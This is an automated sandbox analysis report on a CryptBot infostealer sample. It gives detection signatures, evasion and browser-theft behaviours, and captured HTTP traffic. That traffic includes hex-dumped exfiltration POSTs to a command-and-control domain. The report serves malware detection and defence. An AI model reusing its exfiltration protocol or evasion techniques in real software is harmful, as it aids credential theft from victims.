Windows Analysis Report
PhwUGyok2i.exe

Overview

General Information

Sample name: PhwUGyok2i.exe
renamed because original name is a hash value
Original sample name: 85f533c254c7c3272a960d8ce7657f48.exe
Analysis ID: 1580271
MD5: 85f533c254c7c3272a960d8ce7657f48
SHA1: 80e2b84ca0aab55ac9b31b0947bd7194a9a6e401
SHA256: e0b7f3104ae6f720d039a0609eb2900cfd75f18c977421943b1007bcba4fa171
Tags: exeuser-abuse_ch
Infos:

Detection

Clipboard Hijacker, Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Attempt to bypass Chrome Application-Bound Encryption
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Clipboard Hijacker
Yara detected Cryptbot
AI detected suspicious sample
Drops large PE files
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Detected potential crypto function
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
CryptBot A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

AV Detection

barindex
Source: PhwUGyok2i.exe Avira: detected
Source: PhwUGyok2i.exe Virustotal: Detection: 53% Perma Link
Source: PhwUGyok2i.exe ReversingLabs: Detection: 60%
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: PhwUGyok2i.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_001615B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 7_2_001615B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C5E14B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 7_2_6C5E14B0
Source: PhwUGyok2i.exe, 00000000.00000003.2369565851.0000000007300000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_78bddfb4-6
Source: PhwUGyok2i.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\ Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\doomed\ Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\0absryc3.default\ Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea ecx, dword ptr [esp+04h] 7_2_001681E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 7_2_6C600860
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 7_2_6C60A970
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 7_2_6C6AC920
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 7_2_6C60A9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 7_2_6C60A9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C6BF960h 7_2_6C5FEB10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 7_2_6C676BF0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 7_2_6C6884A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 7_2_6C60C510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 7_2_6C60A5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 7_2_6C60A5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 7_2_6C60A580
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 7_2_6C60E6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 7_2_6C60E6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 7_2_6C600740
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, ecx 7_2_6C680730
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+04h] 7_2_6C63A1E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 7_2_6C600260
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [6C6BD014h] 7_2_6C6B4360
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 7_2_6C657D10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 7_2_6C653840
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+04h] 7_2_6C60D974
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 7_2_6C61BBD7
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 7_2_6C61BBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 7_2_6C65B4D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 7_2_6C60D504
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+0Ch] 7_2_6C60D674
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 7_2_6C659600
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C6BDFF4h 7_2_6C653690
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+08h] 7_2_6C60D7F4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 7_2_6C683140
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 7_2_6C5FB1D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 7_2_6C65B1F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 7_2_6C5FB241
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 7_2_6C60D2A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 7_2_6C6773A0
Source: chrome.exe Memory has grown: Private usage: 1MB later: 29MB

Networking

barindex
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.6:49724 -> 185.121.15.192:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.6:49739 -> 185.121.15.192:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.6:49725 -> 185.121.15.192:80
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global traffic HTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 502151Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 35 30 32 35 37 33 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: global traffic HTTP traffic detected: GET /TQIuuaqjNpwYjtUvFojm1734579850?argument=TVZpFH8q7pU5ACkv1735025739 HTTP/1.1Host: home.twentytk20ht.topAccept: */*
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: twentytk20ht.topAccept: */*Content-Length: 463Content-Type: multipart/form-data; boundary=------------------------xkBIOR2bEiv6RYwoTCNYcMData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 78 6b 42 49 4f 52 32 62 45 69 76 36 52 59 77 6f 54 43 4e 59 63 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 75 73 6f 79 69 6e 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 86 df 87 13 03 20 ea 6b 03 f6 b0 2c a9 93 5d f6 c1 e0 7d a7 24 29 e9 82 33 d4 6f 4b b0 cf 72 28 3d cf 64 73 cd 85 41 58 ae 32 90 a7 90 46 7d 60 07 34 16 73 fd 6b f7 59 bc a4 95 ef d3 ef fa b0 1e 97 3a e1 80 3c b7 99 78 a2 b9 8d 12 76 0a 98 99 52 88 b3 af 8a 94 60 c2 8e 0d 19 74 81 b9 c4 00 e6 e2 05 cd 4a 53 86 35 eb 29 03 75 26 ad 5b 04 d6 0c 06 ec 8c 1d f4 1a c4 7c 27 a6 65 da 5a 10 40 e5 ab 4b 61 a5 8e 0d 53 93 ff 66 d6 3f 0b db 41 df 89 20 f4 46 1f 7d 6e ab 4b fb f8 97 64 41 75 83 2d 09 01 f8 13 3c 47 45 0f 7d 0c 23 18 62 43 31 80 f1 f7 ef 39 d9 50 f7 eb 4d 34 ad e2 08 54 a6 8e a7 de f4 73 25 87 73 09 37 d5 71 26 fc e9 06 29 73 88 e9 4b 8a b6 95 59 87 a3 f0 ac 3a fc ef 93 53 44 8a 6c 48 6c 2c eb d3 5d d8 54 5b 38 26 2a 47 7d d3 d0 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 78 6b 42 49 4f 52 32 62 45 69 76 36 52 59 77 6f 54 43 4e 59 63 4d 2d 2d 0d 0a Data Ascii: --------------------------xkBIOR2bEiv6RYwoTCNYcMContent-Disposition: form-data; name="file"; filename="Susoyin.bin"Content-Type: application/octet-stream k,]}$)3oKr(=dsAX2F}`4skY:<xvR`tJS5)u&[|'eZ@KaSf?A F}nKdAu-<GE}#bC19PM4Ts%s7q&)sKY:SDlHl,]T[8&*G}--------------------------xkBIOR2bEiv6RYwoTCNYcM--
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: twentytk20ht.topAccept: */*Content-Length: 76962Content-Type: multipart/form-data; boundary=------------------------qs6FdrnfDPa8AvRIgIKrYcData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 71 73 36 46 64 72 6e 66 44 50 61 38 41 76 52 49 67 49 4b 72 59 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 58 6f 7a 69 68 6f 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 71 26 dc 01 10 c6 6c 9a b7 66 e2 2c bc 85 e9 32 a6 e0 1c c4 2d 9d b8 22 55 1e 5b d0 b3 27 6d 80 09 26 8a bb f1 97 9c 7a 67 be 18 b7 23 53 0f b0 96 0e cd 72 cd b1 5e 64 40 42 de 6d 7c 8c 55 33 50 36 8d 46 81 ce 18 de e0 7f 77 d9 20 ea d0 cc c0 1c d3 a8 c7 b7 f2 c7 09 a7 1d 1e b4 53 c1 bd aa 39 e3 b7 e5 8d fc a0 0c 2c 28 ce 64 50 5a 07 4c 87 6e 34 7a 49 a7 ef ec 79 7e 39 27 06 f2 ad 58 f8 2a 14 32 3c a7 7d 16 15 cf a8 31 5a 93 87 a3 63 5a dd b3 64 c2 96 b9 5c d8 e4 88 37 4f 37 a3 5d c7 98 f2 50 ea 59 8b f2 00 7d 0b f6 da 48 0e 57 7c 91 85 55 5c 4f 38 ba 7c 51 37 21 c7 45 8d c2 fd 01 73 28 c4 17 c5 f5 f7 ba 68 54 e9 c8 7d 8e 3d ee b7 4c 55 ec 54 27 f1 50 78 48 58 12 10 f1 d2 bf c2 85 85 14 da 87 38 03 03 f5 4b 81 5d 64 ed cc 19 45 56 73 b9 c7 04 ce a4 1c 8c 1e 14 8e 91 4a bf 00 68 00 9e 0e a8 e1 14 a2 05 9c 7c f4 00 14 d5 d0 30 4c 46 a2 b2 78 70 d4 43 d6 49 a0 2e d9 41 c5 37 4e 60 91 13 13 e2 89 6a 65 c9 30 3a ce 44 b4 3b d3 03 76 39 3d 5f f2 7b 5a 46 93 c6 60 6b a6 3b b8 3e d8 b4 a7 82 3a 56 e2 60 51 30 85 fc 84 d0 36 7f 8a 1b be b4 bf 65 c2 ce 56 eb 62 8f 51 59 16 08 63 b0 04 68 b7 31 a6 90 8f 11 4a a7 50 57 d4 39 d2 b5 d7 49 e4 29 01 5a 07 7b 36 43 c6 78 5b dd b6 8a 32 b8 05 64 87 be 50 ed 4c 90 a2 14 18 e9 48 a7 84 da e8 3d 12 d3 7e e5 29 db a1 30 16 9a 8d 1a 2a b3 02 df 94 ed cd aa c2 f8 e6 98 1a 4c 94 a1 ab c6 88 db 57 4e 30 23 39 28 28 5b 99 9d e2 c5 cd d2 38 8a a5 c4 c6 33 b0 66 61 e9 4d 52 b5 f3 d8 9e 32 17 91 a3 7d df 74 9f 1e e1 80 d9 b5 a2 4f 3a 19 3a 4f 01 17 96 43 89 99 fc 77 cb e3 35 4e e8 de e1 cd 4b 7a 74 5c 9f 9f 48 25 7a ed 95 52 c0 83 22 f5 dd fe 49 8c be e7 1b 7e d1 4f c5 ab 72 80 c9 cb 95 28 d0 b1 29 58 80 cd e2 4e 8a d9 87 a3 c9 a3 41 c3 d1 08 8d 22 e8 dd 4d 4d 5e 7e e2 ce 43 22 e1 d8 10 c4 96 ec f6 5a 79 1d 8d 03 cf 36 8f 70 88 23 7c 5a e5 87 f8 52 18 13 ac 4a c1 b5 43 89 9a 0b aa c2 a2 91 3f 84 7b e9 82 37 ba cf 51 97 de 05 1a 87 94 28 8a 68 ea b7 76 68 9e b0 93 2a 82 e0 e9 9c 0d a8 3e 09 dc 72 b9 36 a5 38 93 b0 c8 ed cb dc d9 b1 40 2a 85 eb 75 3f 3d 07 fb 64 51 ed 8c bf a6 5d 72 d8 0f eb d2 6d db d5 19 38 29 41 93 c7 73 11 c4 53 12 1e d6 e2 e5 39 14 20 98 1b 27 89 ba 17 a1 17 58 89 68 cc ac 43 0c 83 26 e7 fb 00 e2 70 12 67 78 a4 c7 09 13 97 e4 11 24 ce 8e 46 ad ff d1 45 4e 21 bc 12 22 ab f9 44 6b 88 8b 8d 6c e4 66 8e 91 ed c8 48 fa 03 3c 29 fa 96 60 ab 97 97 68 4b
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: twentytk20ht.topAccept: */*Content-Length: 30408Content-Type: multipart/form-data; boundary=------------------------wye3M10k8e5C8TBjeZPi4PData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 77 79 65 33 4d 31 30 6b 38 65 35 43 38 54 42 6a 65 5a 50 69 34 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 48 61 70 65 6c 75 71 75 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 07 b8 e5 02 2f ee 6e 27 93 f5 64 e4 57 e6 41 07 b3 7a 77 2c e3 9d ee e8 27 05 3f 7e b9 cf ea f4 c1 58 80 25 ec 46 e8 41 26 c7 a4 8c f2 ae 65 ed e7 ee de 04 24 fd ee 2a 33 33 93 79 7c d2 8e 9c 79 c5 51 2f 53 27 bf ae 2c 11 84 74 49 91 64 dd 9b 3e d7 e5 84 a5 64 3c c8 3d 64 ec 85 87 ed 0e d8 98 f1 79 74 04 d6 f8 13 3e 89 85 da f5 b3 40 77 7e 25 75 7d 90 02 ef bb b4 5d 71 84 90 4b 3d 18 a8 05 bc ca b4 aa 3a f5 3c 04 ce 33 a2 72 30 f5 7f f1 62 1d 3e f3 09 e7 e5 80 08 72 39 3c 9a d6 ed da d5 78 bd 63 59 f0 ca f5 72 92 40 b1 23 a7 ee 5b 04 56 22 81 1a 8e 87 35 d4 0d 42 85 12 41 10 f2 ad 49 95 f0 01 49 60 f9 25 7b 31 4e c8 1d cb 57 84 71 87 a6 23 bf 44 23 d2 75 74 ea 0e 70 b4 b5 9d 2b 3c f4 77 85 88 11 fa fa 91 bc 18 d9 62 1f 7f 7b c7 e4 21 4e d3 2a ef d5 91 89 fd 79 cc ce 37 ef c1 05 33 14 41 74 89 2b 44 1f be 46 91 db 77 9c 57 a7 f3 1b a6 07 df be 8c ee 17 d0 05 41 79 2b 9d d7 e4 d8 c1 09 6c 8f 53 c5 62 03 0a e2 24 f3 27 c8 92 ca a8 e5 a3 e9 af cd 53 54 55 42 79 c2 ec 00 e8 64 0c 7e 5b ef 9f 5c 4a 22 e5 cb 02 f7 56 d9 fb 40 1c 7e 6d f3 48 a8 c5 f6 ef 19 e5 2d e6 61 10 ca 69 9d 7a 2d a9 ca 4c 4d 19 64 b9 1e 4b 0d 0f fe f0 a3 68 77 3c ee 22 ff ad 81 dd 4c 03 6e ed e7 eb 5a 14 19 66 ac 35 e5 be 51 84 69 05 e0 af 04 2c 67 df 2c 14 7f ba 16 f9 a5 98 ed cf 3c 4f be ac 0e 49 d1 b7 5d 23 f7 f1 f9 5c d5 6c 7c 26 c8 99 50 d8 80 54 c8 cf e6 6f d7 9f a9 64 8d 1b 2a 91 ea b2 1b 75 75 e0 39 95 7a 82 85 36 39 00 bd 6e 9a b0 d5 93 a6 4e 82 74 5c 17 04 76 e8 39 60 e9 fc ee ae 35 b5 99 98 9e 0c 3f 05 5b 16 e7 8e 02 24 ea 9c 7a 69 61 1e 53 3d 51 62 e0 1c 07 c4 5f 83 b7 7a 01 ee 91 3d 99 95 58 e4 9e 63 fc fb d9 34 bc 6c 2e a2 99 44 95 f5 17 7b 44 65 7b a4 ad 89 d7 43 17 e7 8a 06 aa e2 77 80 73 95 64 7f 78 52 00 d1 e0 fb 3e 43 da 6e 5b 76 44 94 ee fe 76 bb 6a 22 36 ec 92 9f b2 58 91 fe 12 60 e2 90 10 53 c0 99 fb ad ea 45 95 ab f7 da ef 56 31 95 5b 8d 58 4a 5b 0e d4 4d 4d 77 3a 7d c9 77 d5 59 ef d3 52 84 2a 97 64 00 af c4 f7 e5 36 df 70 39 01 ae 06 ce 29 6a 3d 3f 19 f1 7e f8 13 ec ee 24 38 87 b0 f1 b6 76 5e 04 68 60 7a 34 0b 10 e5 a7 31 52 ca 67 9c 0e 0c b3 fa ad 7b 9e 4e 2e 2d dd 20 6f b8 56 fb 0b f5 50 b7 1c ed cc 92 be 57 b8 c3 d2 91 2c 06 56 12 f3 03 11 9b 0d fb b7 bc 53 ac 6f 80 00 fa 09 47 d8 4a 67 38 6c f7 3e 8d 96 78 44 40 95 fc 66 9c 60 d4 20 ac 55 92 15 35 70 7a 2f 10 a8 85 82 be ae ca 47 df bb bd
Source: global traffic HTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 56Data Raw: 7b 20 22 69 64 31 22 3a 20 22 54 56 5a 70 46 48 38 71 37 70 55 35 41 43 6b 76 31 37 33 35 30 32 35 37 33 39 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 32 22 20 7d Data Ascii: { "id1": "TVZpFH8q7pU5ACkv1735025739", "data": "Done2" }
Source: Joe Sandbox View IP Address: 185.121.15.192 185.121.15.192
Source: Joe Sandbox View IP Address: 34.226.108.155 34.226.108.155
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global traffic HTTP traffic detected: GET /TQIuuaqjNpwYjtUvFojm1734579850?argument=TVZpFH8q7pU5ACkv1735025739 HTTP/1.1Host: home.twentytk20ht.topAccept: */*
Source: chrome.exe, 00000004.00000003.2784554689.00005E100285C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811550196.00005E10028E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000003.2784554689.00005E100285C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811550196.00005E10028E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
